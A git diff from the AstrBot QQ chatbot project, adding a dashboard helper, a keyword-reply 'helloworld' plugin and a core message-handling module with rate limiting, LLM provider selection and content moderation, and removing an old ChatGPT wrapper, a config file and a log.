else:
|
||||
path = f"data/config/{namespace}.json"
|
||||
if not os.path.exists(path):
|
||||
return []
|
||||
with open(path, "r", encoding="utf-8-sig") as f:
|
||||
ret = [{
|
||||
"config_type": "group",
|
||||
"name": namespace + " 插件配置",
|
||||
"description": "",
|
||||
"body": list(json.load(f).values())
|
||||
},]
|
||||
return ret
|
||||
|
||||
def _generate_outline(self):
|
||||
'''
|
||||
生成配置大纲。目前分为 platform(消息平台配置) 和 llm(语言模型配置) 两大类。
|
||||
插件的info函数中如果带了plugin_type字段,则会被归类到对应的大纲中。目前仅支持 platform 和 llm 两种类型。
|
||||
'''
|
||||
outline = [
|
||||
{
|
||||
"type": "platform",
|
||||
"name": "配置通用消息平台",
|
||||
"body": [
|
||||
{
|
||||
"title": "通用",
|
||||
"desc": "通用平台配置",
|
||||
"namespace": "internal_platform_general",
|
||||
"tag": ""
|
||||
},
|
||||
{
|
||||
"title": "QQ_OFFICIAL",
|
||||
"desc": "QQ官方API,仅支持频道",
|
||||
"namespace": "internal_platform_qq_official",
|
||||
"tag": ""
|
||||
},
|
||||
{
|
||||
"title": "OneBot协议",
|
||||
"desc": "支持cq-http、shamrock等(目前仅支持QQ平台)",
|
||||
"namespace": "internal_platform_qq_gocq",
|
||||
"tag": ""
|
||||
}
|
||||
]
|
||||
},
|
||||
{
|
||||
"type": "llm",
|
||||
"name": "配置 LLM",
|
||||
"body": [
|
||||
{
|
||||
"title": "OpenAI Official",
|
||||
"desc": "也支持使用官方接口的中转服务",
|
||||
"namespace": "internal_llm_openai_official",
|
||||
"tag": ""
|
||||
}
|
||||
]
|
||||
}
|
||||
]
|
||||
for plugin in self.global_object.cached_plugins:
|
||||
for item in outline:
|
||||
if item['type'] == plugin.metadata.plugin_type:
|
||||
item['body'].append({
|
||||
"title": plugin.metadata.plugin_name,
|
||||
"desc": plugin.metadata.desc,
|
||||
"namespace": plugin.metadata.plugin_name,
|
||||
"tag": plugin.metadata.plugin_name
|
||||
})
|
||||
return outline
|
||||
|
||||
def register(self, name: str):
|
||||
def decorator(func):
|
||||
self.funcs[name] = func
|
||||
return func
|
||||
return decorator
|
||||
|
||||
async def get_log_history(self):
|
||||
try:
|
||||
with open("logs/astrbot-core/astrbot-core.log", "r", encoding="utf-8") as f:
|
||||
return f.readlines()[-100:]
|
||||
except Exception as e:
|
||||
logger.warning(f"读取日志历史失败: {e.__str__()}")
|
||||
return []
|
||||
|
||||
async def __handle_msg(self, websocket, path):
|
||||
address = websocket.remote_address
|
||||
self.ws_clients[address] = websocket
|
||||
data = await self.get_log_history()
|
||||
data = ''.join(data).replace('\n', '\r\n')
|
||||
await websocket.send(data)
|
||||
while True:
|
||||
try:
|
||||
msg = await websocket.recv()
|
||||
except websockets.exceptions.ConnectionClosedError:
|
||||
# logger.info(f"和 {address} 的 websocket 连接已断开")
|
||||
del self.ws_clients[address]
|
||||
break
|
||||
except Exception as e:
|
||||
# logger.info(f"和 {path} 的 websocket 连接发生了错误: {e.__str__()}")
|
||||
del self.ws_clients[address]
|
||||
break
|
||||
|
||||
def run_ws_server(self, loop):
|
||||
asyncio.set_event_loop(loop)
|
||||
loop.run_until_complete(self.ws_server)
|
||||
loop.run_forever()
|
||||
|
||||
def run(self):
|
||||
threading.Thread(target=self.run_ws_server, args=(self.loop,)).start()
|
||||
logger.info("已启动 websocket 服务器")
|
||||
ip_address = gu.get_local_ip_addresses()
|
||||
ip_str = f"http://{ip_address}:6185\n\thttp://localhost:6185"
|
||||
logger.info(
|
||||
f"\n==================\n您可访问:\n\n\t{ip_str}\n\n来登录可视化面板,默认账号密码为空。\n注意: 所有配置项现已全量迁移至 cmd_config.json 文件下,可登录可视化面板在线修改配置。\n==================\n")
|
||||
|
||||
http_server = make_server(
|
||||
'0.0.0.0', 6185, self.dashboard_be, threaded=True)
|
||||
http_server.serve_forever()
|
||||
168
addons/plugins/helloworld/helloworld.py
Normal file
@@ -0,0 +1,168 @@
|
||||
import os
|
||||
import shutil
|
||||
from nakuru.entities.components import *
|
||||
flag_not_support = False
|
||||
try:
|
||||
from util.plugin_dev.api.v1.config import *
|
||||
from util.plugin_dev.api.v1.bot import (
|
||||
AstrMessageEvent,
|
||||
CommandResult,
|
||||
)
|
||||
except ImportError:
|
||||
flag_not_support = True
|
||||
print("导入接口失败。请升级到 AstrBot 最新版本。")
|
||||
|
||||
|
||||
'''
|
||||
注意改插件名噢!格式:XXXPlugin 或 Main
|
||||
小提示:把此模板仓库 fork 之后 clone 到机器人文件夹下的 addons/plugins/ 目录下,然后用 Pycharm/VSC 等工具打开可获更棒的编程体验(自动补全等)
|
||||
'''
|
||||
|
||||
|
||||
class HelloWorldPlugin:
|
||||
"""
|
||||
初始化函数, 可以选择直接pass
|
||||
"""
|
||||
|
||||
def __init__(self) -> None:
|
||||
# 复制旧配置文件到 data 目录下。
|
||||
if os.path.exists("keyword.json"):
|
||||
shutil.move("keyword.json", "data/keyword.json")
|
||||
self.keywords = {}
|
||||
if os.path.exists("data/keyword.json"):
|
||||
self.keywords = json.load(open("data/keyword.json", "r"))
|
||||
else:
|
||||
self.save_keyword()
|
||||
|
||||
"""
|
||||
机器人程序会调用此函数。
|
||||
返回规范: bool: 插件是否响应该消息 (所有的消息均会调用每一个载入的插件, 如果不响应, 则应返回 False)
|
||||
Tuple: Non e或者长度为 3 的元组。如果不响应, 返回 None; 如果响应, 第 1 个参数为指令是否调用成功, 第 2 个参数为返回的消息链列表, 第 3 个参数为指令名称
|
||||
例子:一个名为"yuanshen"的插件;当接收到消息为“原神 可莉”, 如果不想要处理此消息,则返回False, None;如果想要处理,但是执行失败了,返回True, tuple([False, "请求失败。", "yuanshen"]) ;执行成功了,返回True, tuple([True, "结果文本", "yuanshen"])
|
||||
"""
|
||||
|
||||
def run(self, ame: AstrMessageEvent):
|
||||
if ame.message_str == "helloworld":
|
||||
return CommandResult(
|
||||
hit=True,
|
||||
success=True,
|
||||
message_chain=[Plain("Hello World!!")],
|
||||
command_name="helloworld"
|
||||
)
|
||||
if ame.message_str.startswith("/keyword") or ame.message_str.startswith("keyword"):
|
||||
return self.handle_keyword_command(ame)
|
||||
|
||||
ret = self.check_keyword(ame.message_str)
|
||||
if ret:
|
||||
return ret
|
||||
|
||||
return CommandResult(
|
||||
hit=False,
|
||||
success=False,
|
||||
message_chain=None,
|
||||
command_name=None
|
||||
)
|
||||
|
||||
def handle_keyword_command(self, ame: AstrMessageEvent):
|
||||
l = ame.message_str.split(" ")
|
||||
|
||||
# 获取图片
|
||||
image_url = ""
|
||||
for comp in ame.message_obj.message:
|
||||
if isinstance(comp, Image) and image_url == "":
|
||||
if comp.url is None:
|
||||
image_url = comp.file
|
||||
else:
|
||||
image_url = comp.url
|
||||
|
||||
command_result = CommandResult(
|
||||
hit=True,
|
||||
success=False,
|
||||
message_chain=None,
|
||||
command_name="keyword"
|
||||
)
|
||||
if len(l) == 1 or (len(l) == 2 and image_url == ""):
|
||||
ret = """【设置关键词回复】
|
||||
示例:
|
||||
1. keyword <触发词> <回复词>
|
||||
keyword hi 你好
|
||||
发送 hi 回复你好
|
||||
* 回复词支持图片
|
||||
|
||||
2. keyword d <触发词>
|
||||
keyword d hi
|
||||
删除 hi 触发词产生的回复"""
|
||||
command_result.success = True
|
||||
command_result.message_chain = [Plain(ret)]
|
||||
return command_result
|
||||
elif len(l) == 3 and l[1] == "d":
|
||||
if l[2] not in self.keywords:
|
||||
command_result.message_chain = [Plain(f"关键词 {l[2]} 不存在")]
|
||||
return command_result
|
||||
self.keywords.pop(l[2])
|
||||
self.save_keyword()
|
||||
command_result.success = True
|
||||
command_result.message_chain = [Plain("删除成功")]
|
||||
return command_result
|
||||
else:
|
||||
self.keywords[l[1]] = {
|
||||
"plain_text": " ".join(l[2:]),
|
||||
"image_url": image_url
|
||||
}
|
||||
self.save_keyword()
|
||||
command_result.success = True
|
||||
command_result.message_chain = [Plain("设置成功")]
|
||||
return command_result
|
||||
|
||||
def save_keyword(self):
|
||||
json.dump(self.keywords, open(
|
||||
"data/keyword.json", "w"), ensure_ascii=False)
|
||||
|
||||
def check_keyword(self, message_str: str):
|
||||
for k in self.keywords:
|
||||
if message_str == k:
|
||||
plain_text = ""
|
||||
if 'plain_text' in self.keywords[k]:
|
||||
plain_text = self.keywords[k]['plain_text']
|
||||
else:
|
||||
plain_text = self.keywords[k]
|
||||
image_url = ""
|
||||
if 'image_url' in self.keywords[k]:
|
||||
image_url = self.keywords[k]['image_url']
|
||||
if image_url != "":
|
||||
res = [Plain(plain_text), Image.fromURL(image_url)]
|
||||
return CommandResult(
|
||||
hit=True,
|
||||
success=True,
|
||||
message_chain=res,
|
||||
command_name="keyword"
|
||||
)
|
||||
return CommandResult(
|
||||
hit=True,
|
||||
success=True,
|
||||
message_chain=[Plain(plain_text)],
|
||||
command_name="keyword"
|
||||
)
|
||||
|
||||
"""
|
||||
插件元信息。
|
||||
当用户输入 plugin v 插件名称 时,会调用此函数,返回帮助信息。
|
||||
返回参数要求(必填):dict{
|
||||
"name": str, # 插件名称
|
||||
"desc": str, # 插件简短描述
|
||||
"help": str, # 插件帮助信息
|
||||
"version": str, # 插件版本
|
||||
"author": str, # 插件作者
|
||||
"repo": str, # 插件仓库地址 [ 可选 ]
|
||||
"homepage": str, # 插件主页 [ 可选 ]
|
||||
}
|
||||
"""
|
||||
|
||||
def info(self):
|
||||
return {
|
||||
"name": "helloworld",
|
||||
"desc": "这是 AstrBot 的默认插件,支持关键词回复。",
|
||||
"help": "输入 /keyword 查看关键词回复帮助。",
|
||||
"version": "v1.3",
|
||||
"author": "Soulter"
|
||||
}
|
||||
@@ -1,29 +0,0 @@
|
||||
from revChatGPT.V1 import Chatbot
|
||||
|
||||
class revChatGPT:
|
||||
def __init__(self, config):
|
||||
|
||||
print("[RevChatGPT] 逆向库初始化:"+str(config))
|
||||
config['password'] = str(config['password'])
|
||||
self.chatbot = Chatbot(config=config)
|
||||
|
||||
def chat(self, prompt):
|
||||
resp = ''
|
||||
|
||||
err_count = 0
|
||||
retry_count = 5
|
||||
|
||||
while err_count < retry_count:
|
||||
try:
|
||||
for data in self.chatbot.ask(prompt):
|
||||
resp = data["message"]
|
||||
break
|
||||
except BaseException as e:
|
||||
print(e)
|
||||
print("[RevChatGPT] 请求出现了一些问题, 正在重试。次数"+str(err_count))
|
||||
err_count += 1
|
||||
if err_count == retry_count:
|
||||
raise e
|
||||
|
||||
print("[RevChatGPT] "+str(resp))
|
||||
return resp
|
||||
491
astrbot/core.py
Normal file
@@ -0,0 +1,491 @@
|
||||
import re
|
||||
import threading
|
||||
import asyncio
|
||||
import time
|
||||
import util.unfit_words as uw
|
||||
import os
|
||||
import sys
|
||||
import traceback
|
||||
|
||||
import util.agent.web_searcher as web_searcher
|
||||
import util.plugin_util as putil
|
||||
|
||||
from nakuru.entities.components import Plain, At, Image
|
||||
|
||||
from addons.baidu_aip_judge import BaiduJudge
|
||||
from model.provider.provider import Provider
|
||||
from model.command.command import Command
|
||||
from util import general_utils as gu
|
||||
from util.general_utils import upload, run_monitor
|
||||
from util.cmd_config import CmdConfig as cc
|
||||
from util.cmd_config import init_astrbot_config_items
|
||||
from type.types import GlobalObject
|
||||
from type.register import *
|
||||
from type.message import AstrBotMessage
|
||||
from addons.dashboard.helper import DashBoardHelper
|
||||
from addons.dashboard.server import DashBoardData
|
||||
from persist.session import dbConn
|
||||
from model.platform._message_result import MessageResult
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot-core')
|
||||
|
||||
# 用户发言频率
|
||||
user_frequency = {}
|
||||
# 时间默认值
|
||||
frequency_time = 60
|
||||
# 计数默认值
|
||||
frequency_count = 10
|
||||
|
||||
# 版本
|
||||
version = '3.1.13'
|
||||
|
||||
# 语言模型
|
||||
OPENAI_OFFICIAL = 'openai_official'
|
||||
NONE_LLM = 'none_llm'
|
||||
chosen_provider = None
|
||||
# 语言模型对象
|
||||
llm_instance: dict[str, Provider] = {}
|
||||
llm_command_instance: dict[str, Command] = {}
|
||||
llm_wake_prefix = ""
|
||||
|
||||
# 百度内容审核实例
|
||||
baidu_judge = None
|
||||
|
||||
# CLI
|
||||
PLATFORM_CLI = 'cli'
|
||||
|
||||
init_astrbot_config_items()
|
||||
|
||||
# 全局对象
|
||||
_global_object: GlobalObject = None
|
||||
|
||||
# 语言模型选择
|
||||
|
||||
|
||||
def privider_chooser(cfg):
|
||||
l = []
|
||||
if 'openai' in cfg and len(cfg['openai']['key']) > 0 and cfg['openai']['key'][0] is not None:
|
||||
l.append('openai_official')
|
||||
return l
|
||||
|
||||
|
||||
'''
|
||||
初始化机器人
|
||||
'''
|
||||
|
||||
|
||||
def init():
|
||||
global llm_instance, llm_command_instance
|
||||
global baidu_judge, chosen_provider
|
||||
global frequency_count, frequency_time
|
||||
global _global_object
|
||||
|
||||
# 迁移旧配置
|
||||
gu.try_migrate_config()
|
||||
# 使用新配置
|
||||
cfg = cc.get_all()
|
||||
|
||||
_event_loop = asyncio.new_event_loop()
|
||||
asyncio.set_event_loop(_event_loop)
|
||||
|
||||
# 初始化 global_object
|
||||
_global_object = GlobalObject()
|
||||
_global_object.version = version
|
||||
_global_object.base_config = cfg
|
||||
logger.info("AstrBot v"+version)
|
||||
|
||||
if 'reply_prefix' in cfg:
|
||||
# 适配旧版配置
|
||||
if isinstance(cfg['reply_prefix'], dict):
|
||||
_global_object.reply_prefix = ""
|
||||
cfg['reply_prefix'] = ""
|
||||
cc.put("reply_prefix", "")
|
||||
else:
|
||||
_global_object.reply_prefix = cfg['reply_prefix']
|
||||
|
||||
default_personality_str = cc.get("default_personality_str", "")
|
||||
if default_personality_str == "":
|
||||
_global_object.default_personality = None
|
||||
else:
|
||||
_global_object.default_personality = {
|
||||
"name": "default",
|
||||
"prompt": default_personality_str,
|
||||
}
|
||||
|
||||
# 语言模型提供商
|
||||
logger.info("正在载入语言模型...")
|
||||
prov = privider_chooser(cfg)
|
||||
if OPENAI_OFFICIAL in prov:
|
||||
logger.info("初始化:OpenAI官方")
|
||||
if cfg['openai']['key'] is not None and cfg['openai']['key'] != [None]:
|
||||
from model.provider.openai_official import ProviderOpenAIOfficial
|
||||
from model.command.openai_official import CommandOpenAIOfficial
|
||||
llm_instance[OPENAI_OFFICIAL] = ProviderOpenAIOfficial(
|
||||
cfg['openai'])
|
||||
llm_command_instance[OPENAI_OFFICIAL] = CommandOpenAIOfficial(
|
||||
llm_instance[OPENAI_OFFICIAL], _global_object)
|
||||
_global_object.llms.append(RegisteredLLM(
|
||||
llm_name=OPENAI_OFFICIAL, llm_instance=llm_instance[OPENAI_OFFICIAL], origin="internal"))
|
||||
chosen_provider = OPENAI_OFFICIAL
|
||||
|
||||
instance = llm_instance[OPENAI_OFFICIAL]
|
||||
assert isinstance(instance, ProviderOpenAIOfficial)
|
||||
instance.DEFAULT_PERSONALITY = _global_object.default_personality
|
||||
instance.curr_personality = instance.DEFAULT_PERSONALITY
|
||||
|
||||
# 检查provider设置偏好
|
||||
p = cc.get("chosen_provider", None)
|
||||
if p is not None and p in llm_instance:
|
||||
chosen_provider = p
|
||||
|
||||
# 百度内容审核
|
||||
if 'baidu_aip' in cfg and 'enable' in cfg['baidu_aip'] and cfg['baidu_aip']['enable']:
|
||||
try:
|
||||
baidu_judge = BaiduJudge(cfg['baidu_aip'])
|
||||
logger.info("百度内容审核初始化成功")
|
||||
except BaseException as e:
|
||||
logger.info("百度内容审核初始化失败")
|
||||
|
||||
threading.Thread(target=upload, args=(
|
||||
_global_object, ), daemon=True).start()
|
||||
|
||||
# 得到发言频率配置
|
||||
if 'limit' in cfg:
|
||||
if 'count' in cfg['limit']:
|
||||
frequency_count = cfg['limit']['count']
|
||||
if 'time' in cfg['limit']:
|
||||
frequency_time = cfg['limit']['time']
|
||||
|
||||
try:
|
||||
if 'uniqueSessionMode' in cfg and cfg['uniqueSessionMode']:
|
||||
_global_object.unique_session = True
|
||||
else:
|
||||
_global_object.unique_session = False
|
||||
except BaseException as e:
|
||||
logger.info("独立会话配置错误: "+str(e))
|
||||
|
||||
nick_qq = cc.get("nick_qq", None)
|
||||
if nick_qq == None:
|
||||
nick_qq = ("ai", "!", "!")
|
||||
if isinstance(nick_qq, str):
|
||||
nick_qq = (nick_qq,)
|
||||
if isinstance(nick_qq, list):
|
||||
nick_qq = tuple(nick_qq)
|
||||
_global_object.nick = nick_qq
|
||||
|
||||
# 语言模型唤醒词
|
||||
global llm_wake_prefix
|
||||
llm_wake_prefix = cc.get("llm_wake_prefix", "")
|
||||
|
||||
logger.info("正在载入插件...")
|
||||
# 加载插件
|
||||
_command = Command(None, _global_object)
|
||||
ok, err = putil.plugin_reload(_global_object.cached_plugins)
|
||||
if ok:
|
||||
logger.info(
|
||||
f"成功载入 {len(_global_object.cached_plugins)} 个插件")
|
||||
else:
|
||||
logger.info(err)
|
||||
|
||||
if chosen_provider is None:
|
||||
llm_command_instance[NONE_LLM] = _command
|
||||
chosen_provider = NONE_LLM
|
||||
|
||||
logger.info("正在载入机器人消息平台")
|
||||
# logger.info("提示:需要添加管理员 ID 才能使用 update/plugin 等指令),可在可视化面板添加。(如已添加可忽略)")
|
||||
platform_str = ""
|
||||
# GOCQ
|
||||
if 'gocqbot' in cfg and cfg['gocqbot']['enable']:
|
||||
logger.info("启用 QQ_GOCQ 机器人消息平台")
|
||||
threading.Thread(target=run_gocq_bot, args=(
|
||||
cfg, _global_object), daemon=True).start()
|
||||
platform_str += "QQ_GOCQ,"
|
||||
|
||||
# QQ频道
|
||||
if 'qqbot' in cfg and cfg['qqbot']['enable'] and cfg['qqbot']['appid'] != None:
|
||||
logger.info("启用 QQ_OFFICIAL 机器人消息平台")
|
||||
threading.Thread(target=run_qqchan_bot, args=(
|
||||
cfg, _global_object), daemon=True).start()
|
||||
platform_str += "QQ_OFFICIAL,"
|
||||
|
||||
# 初始化dashboard
|
||||
_global_object.dashboard_data = DashBoardData(
|
||||
stats={},
|
||||
configs={},
|
||||
logs={},
|
||||
plugins=_global_object.cached_plugins,
|
||||
)
|
||||
dashboard_helper = DashBoardHelper(_global_object, config=cc.get_all())
|
||||
dashboard_thread = threading.Thread(
|
||||
target=dashboard_helper.run, daemon=True)
|
||||
dashboard_thread.start()
|
||||
|
||||
# 运行 monitor
|
||||
threading.Thread(target=run_monitor, args=(
|
||||
_global_object,), daemon=True).start()
|
||||
|
||||
logger.info(
|
||||
"如果有任何问题, 请在 https://github.com/Soulter/AstrBot 上提交 issue 或加群 322154837。")
|
||||
logger.info("请给 https://github.com/Soulter/AstrBot 点个 star。")
|
||||
if platform_str == '':
|
||||
platform_str = "(未启动任何平台,请前往面板添加)"
|
||||
logger.info(f"🎉 项目启动完成")
|
||||
|
||||
dashboard_thread.join()
|
||||
|
||||
|
||||
'''
|
||||
运行 QQ_OFFICIAL 机器人
|
||||
'''
|
||||
|
||||
|
||||
def run_qqchan_bot(cfg: dict, global_object: GlobalObject):
|
||||
try:
|
||||
from model.platform.qq_official import QQOfficial
|
||||
qqchannel_bot = QQOfficial(
|
||||
cfg=cfg, message_handler=oper_msg, global_object=global_object)
|
||||
global_object.platforms.append(RegisteredPlatform(
|
||||
platform_name="qqchan", platform_instance=qqchannel_bot, origin="internal"))
|
||||
qqchannel_bot.run()
|
||||
except BaseException as e:
|
||||
logger.error("启动 QQ 频道机器人时出现错误, 原因如下: " + str(e))
|
||||
logger.error(r"如果您是初次启动,请前往可视化面板填写配置。详情请看:https://astrbot.soulter.top/center/。")
|
||||
|
||||
|
||||
'''
|
||||
运行 QQ_GOCQ 机器人
|
||||
'''
|
||||
|
||||
|
||||
def run_gocq_bot(cfg: dict, _global_object: GlobalObject):
|
||||
from model.platform.qq_gocq import QQGOCQ
|
||||
|
||||
noticed = False
|
||||
host = cc.get("gocq_host", "127.0.0.1")
|
||||
port = cc.get("gocq_websocket_port", 6700)
|
||||
http_port = cc.get("gocq_http_port", 5700)
|
||||
logger.info(
|
||||
f"正在检查连接...host: {host}, ws port: {port}, http port: {http_port}")
|
||||
while True:
|
||||
if not gu.port_checker(port=port, host=host) or not gu.port_checker(port=http_port, host=host):
|
||||
if not noticed:
|
||||
noticed = True
|
||||
logger.warning(
|
||||
f"连接到{host}:{port}(或{http_port})失败。程序会每隔 5s 自动重试。")
|
||||
time.sleep(5)
|
||||
else:
|
||||
logger.info("已连接到 gocq。")
|
||||
break
|
||||
try:
|
||||
qq_gocq = QQGOCQ(cfg=cfg, message_handler=oper_msg,
|
||||
global_object=_global_object)
|
||||
_global_object.platforms.append(RegisteredPlatform(
|
||||
platform_name="gocq", platform_instance=qq_gocq, origin="internal"))
|
||||
qq_gocq.run()
|
||||
except BaseException as e:
|
||||
input("启动QQ机器人出现错误"+str(e))
|
||||
|
||||
|
||||
'''
|
||||
检查发言频率
|
||||
'''
|
||||
|
||||
|
||||
def check_frequency(id) -> bool:
|
||||
ts = int(time.time())
|
||||
if id in user_frequency:
|
||||
if ts-user_frequency[id]['time'] > frequency_time:
|
||||
user_frequency[id]['time'] = ts
|
||||
user_frequency[id]['count'] = 1
|
||||
return True
|
||||
else:
|
||||
if user_frequency[id]['count'] >= frequency_count:
|
||||
return False
|
||||
else:
|
||||
user_frequency[id]['count'] += 1
|
||||
return True
|
||||
else:
|
||||
t = {'time': ts, 'count': 1}
|
||||
user_frequency[id] = t
|
||||
return True
|
||||
|
||||
|
||||
async def record_message(platform: str, session_id: str):
|
||||
# TODO: 这里会非常吃资源。然而 sqlite3 不支持多线程,所以暂时这样写。
|
||||
curr_ts = int(time.time())
|
||||
db_inst = dbConn()
|
||||
db_inst.increment_stat_session(platform, session_id, 1)
|
||||
db_inst.increment_stat_message(curr_ts, 1)
|
||||
db_inst.increment_stat_platform(curr_ts, platform, 1)
|
||||
_global_object.cnt_total += 1
|
||||
|
||||
|
||||
async def oper_msg(message: AstrBotMessage,
|
||||
session_id: str,
|
||||
role: str = 'member',
|
||||
platform: str = None,
|
||||
) -> MessageResult:
|
||||
"""
|
||||
处理消息。
|
||||
message: 消息对象
|
||||
session_id: 该消息源的唯一识别号
|
||||
role: member | admin
|
||||
platform: str 所注册的平台的名称。如果没有注册,将抛出一个异常。
|
||||
"""
|
||||
global chosen_provider, _global_object
|
||||
message_str = ''
|
||||
session_id = session_id
|
||||
role = role
|
||||
hit = False # 是否命中指令
|
||||
command_result = () # 调用指令返回的结果
|
||||
|
||||
# 获取平台实例
|
||||
reg_platform: RegisteredPlatform = None
|
||||
for p in _global_object.platforms:
|
||||
if p.platform_name == platform:
|
||||
reg_platform = p
|
||||
break
|
||||
if not reg_platform:
|
||||
raise Exception(f"未找到平台 {platform} 的实例。")
|
||||
|
||||
# 统计数据,如频道消息量
|
||||
await record_message(platform, session_id)
|
||||
|
||||
for i in message.message:
|
||||
if isinstance(i, Plain):
|
||||
message_str += i.text.strip()
|
||||
if message_str == "":
|
||||
return MessageResult("Hi~")
|
||||
|
||||
# 检查发言频率
|
||||
if not check_frequency(message.sender.user_id):
|
||||
return MessageResult(f'你的发言超过频率限制(╯▔皿▔)╯。\n管理员设置{frequency_time}秒内只能提问{frequency_count}次。')
|
||||
|
||||
# 检查是否是更换语言模型的请求
|
||||
temp_switch = ""
|
||||
if message_str.startswith('/gpt'):
|
||||
target = chosen_provider
|
||||
if message_str.startswith('/gpt'):
|
||||
target = OPENAI_OFFICIAL
|
||||
l = message_str.split(' ')
|
||||
if len(l) > 1 and l[1] != "":
|
||||
# 临时对话模式,先记录下之前的语言模型,回答完毕后再切回
|
||||
temp_switch = chosen_provider
|
||||
chosen_provider = target
|
||||
message_str = l[1]
|
||||
else:
|
||||
chosen_provider = target
|
||||
cc.put("chosen_provider", chosen_provider)
|
||||
return MessageResult(f"已切换至【{chosen_provider}】")
|
||||
|
||||
llm_result_str = ""
|
||||
|
||||
# check commands and plugins
|
||||
message_str_no_wake_prefix = message_str
|
||||
for wake_prefix in _global_object.nick: # nick: tuple
|
||||
if message_str.startswith(wake_prefix):
|
||||
message_str_no_wake_prefix = message_str.removeprefix(wake_prefix)
|
||||
break
|
||||
hit, command_result = await llm_command_instance[chosen_provider].check_command(
|
||||
message_str_no_wake_prefix,
|
||||
session_id,
|
||||
role,
|
||||
reg_platform,
|
||||
message,
|
||||
)
|
||||
|
||||
# 没触发指令
|
||||
if not hit:
|
||||
# 关键词拦截
|
||||
for i in uw.unfit_words_q:
|
||||
matches = re.match(i, message_str.strip(), re.I | re.M)
|
||||
if matches:
|
||||
return MessageResult(f"你的提问得到的回复未通过【默认关键词拦截】服务, 不予回复。")
|
||||
if baidu_judge != None:
|
||||
check, msg = await asyncio.to_thread(baidu_judge.judge, message_str)
|
||||
if not check:
|
||||
return MessageResult(f"你的提问得到的回复未通过【百度AI内容审核】服务, 不予回复。\n\n{msg}")
|
||||
if chosen_provider == NONE_LLM:
|
||||
logger.info("一条消息由于 Bot 未启动任何语言模型并且未触发指令而将被忽略。")
|
||||
return
|
||||
try:
|
||||
if llm_wake_prefix != "" and not message_str.startswith(llm_wake_prefix):
|
||||
return
|
||||
# check image url
|
||||
image_url = None
|
||||
for comp in message.message:
|
||||
if isinstance(comp, Image):
|
||||
if comp.url is None:
|
||||
image_url = comp.file
|
||||
break
|
||||
else:
|
||||
image_url = comp.url
|
||||
break
|
||||
# web search keyword
|
||||
web_sch_flag = False
|
||||
if message_str.startswith("ws ") and message_str != "ws ":
|
||||
message_str = message_str[3:]
|
||||
web_sch_flag = True
|
||||
else:
|
||||
message_str += " " + cc.get("llm_env_prompt", "")
|
||||
if chosen_provider == OPENAI_OFFICIAL:
|
||||
if _global_object.web_search or web_sch_flag:
|
||||
official_fc = chosen_provider == OPENAI_OFFICIAL
|
||||
llm_result_str = await web_searcher.web_search(message_str, llm_instance[chosen_provider], session_id, official_fc)
|
||||
else:
|
||||
llm_result_str = await llm_instance[chosen_provider].text_chat(message_str, session_id, image_url)
|
||||
|
||||
llm_result_str = _global_object.reply_prefix + llm_result_str
|
||||
except BaseException as e:
|
||||
logger.error(f"调用异常:{traceback.format_exc()}")
|
||||
return MessageResult(f"调用异常。详细原因:{str(e)}")
|
||||
|
||||
# 切换回原来的语言模型
|
||||
if temp_switch != "":
|
||||
chosen_provider = temp_switch
|
||||
|
||||
if hit:
|
||||
# 有指令或者插件触发
|
||||
# command_result 是一个元组:(指令调用是否成功, 指令返回的文本结果, 指令类型)
|
||||
if command_result == None:
|
||||
return
|
||||
command = command_result[2]
|
||||
|
||||
if command == "update latest r":
|
||||
def update_restart():
|
||||
py = sys.executable
|
||||
os.execl(py, py, *sys.argv)
|
||||
return MessageResult(command_result[1] + "\n\n即将自动重启。", callback=update_restart)
|
||||
|
||||
if not command_result[0]:
|
||||
return MessageResult(f"指令调用错误: \n{str(command_result[1])}")
|
||||
|
||||
# 画图指令
|
||||
if command == 'draw':
|
||||
# 保存到本地
|
||||
path = await gu.download_image_by_url(command_result[1])
|
||||
return MessageResult([Image.fromFileSystem(path)])
|
||||
# 其他指令
|
||||
else:
|
||||
try:
|
||||
return MessageResult(command_result[1])
|
||||
except BaseException as e:
|
||||
return MessageResult(f"回复消息出错: {str(e)}")
|
||||
return
|
||||
|
||||
# 敏感过滤
|
||||
# 过滤不合适的词
|
||||
for i in uw.unfit_words:
|
||||
llm_result_str = re.sub(i, "***", llm_result_str)
|
||||
# 百度内容审核服务二次审核
|
||||
if baidu_judge != None:
|
||||
check, msg = await asyncio.to_thread(baidu_judge.judge, llm_result_str)
|
||||
if not check:
|
||||
return MessageResult(f"你的提问得到的回复【百度内容审核】未通过,不予回复。\n\n{msg}")
|
||||
# 发送信息
|
||||
try:
|
||||
return MessageResult(llm_result_str)
|
||||
except BaseException as e:
|
||||
logger.info("回复消息错误: \n"+str(e))
|
||||
@@ -1,42 +0,0 @@
|
||||
openai:
|
||||
# 注意:在1.7版本已支持多key自动切换,方法:
|
||||
# key:
|
||||
# - xxxxx
|
||||
# - xxxxxx
|
||||
# 在下方非注释的地方使用以上格式
|
||||
key:
|
||||
-
|
||||
|
||||
chatGPTConfigs:
|
||||
engine: "gpt-3.5-turbo"
|
||||
max_tokens: 1000
|
||||
temperature: 0.9
|
||||
top_p: 1
|
||||
frequency_penalty: 0
|
||||
presence_penalty: 0
|
||||
|
||||
total_tokens_limit: 2000
|
||||
qqbot:
|
||||
appid:
|
||||
token:
|
||||
|
||||
# 设置是否一个人一个会话
|
||||
uniqueSessionMode: false
|
||||
|
||||
# QChannelBot 的版本,请勿修改此字段,否则可能产生一些bug
|
||||
version: 2.4 RealChatGPT Ver.
|
||||
|
||||
# [Beta] 转储历史记录时间间隔(分钟)
|
||||
dump_history_interval: 10
|
||||
|
||||
# 一个用户只能在time秒内发送count条消息
|
||||
limit:
|
||||
time: 60
|
||||
count: 5
|
||||
# 公告
|
||||
notice: "此机器人由Github项目QQChannelChatGPT驱动。"
|
||||
|
||||
# 是否打开私信功能
|
||||
# 设置为true则频道成员可以私聊机器人。
|
||||
# 设置为false则频道成员不能私聊机器人。
|
||||
direct_message_mode: true
|
||||
323
botpy.log
@@ -1,323 +0,0 @@
|
||||
2022-12-08 14:29:09,486 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 14:29:10,173 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 14:29:10,174 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 14:29:10,175 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 14:29:10,175 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
